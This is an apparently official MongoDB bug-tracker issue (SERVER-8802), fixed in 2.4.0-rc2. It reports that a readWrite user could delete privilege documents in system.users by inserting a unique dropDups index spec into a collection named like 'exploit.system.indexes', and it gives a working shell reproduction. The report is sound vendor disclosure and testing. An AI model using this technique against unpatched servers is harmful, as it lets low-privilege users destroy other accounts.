Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-8802

readWrite users can delete privilege documents via ensureIndex

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: 2.4.0-rc1
    • Fix Version/s: 2.4.0-rc2
    • Component/s: Security
    • Labels:
      None

      Description

      There is (arguably) an error in the logic that decides whether to associate ActionType::ensureIndex with an insert request. A readWrite user can exploit this error to initiate a dropDups index build on system.users by writing to a collection named e.g. exploit.system.indexes.

      Reproduce with:

      conn = MongoRunner.runMongod({auth:''})
       
      adminDb = conn.getDB("admin")
      testDb = conn.getDB("test")
      adminDb.addUser({user:'admin', pwd:'x', roles:['userAdminAnyDatabase']})
      adminDb.auth('admin','x')
      adminDb.addUser({user:'mallory', pwd:'x', roles:[], otherDBRoles:{test:['readWrite']}})
      testDb.addUser({user:'user1', pwd:'x', roles:['read']})
      testDb.addUser({user:'user2', pwd:'x', roles:['read']})
      assert.eq(2, testDb.system.users.count())
      adminDb.logout()
       
      adminDb.auth('mallory','x')
      testDb.exploit.system.indexes.insert({ns: "test.system.users", key: { haxx: 1.0 }, name: "haxx_1", unique: true, dropDups: true})
      adminDb.logout()
       
      adminDb.auth('admin','x')
      // The following fails with "assert: [2] != [1] are not equal : undefined"
      assert.eq(2, testDb.system.users.count()) 
       
      MongoRunner.stopMongod(conn)

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              spencer Spencer Brody (Inactive)
              Reporter:
              rassi J Rassi
              Participants:
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved: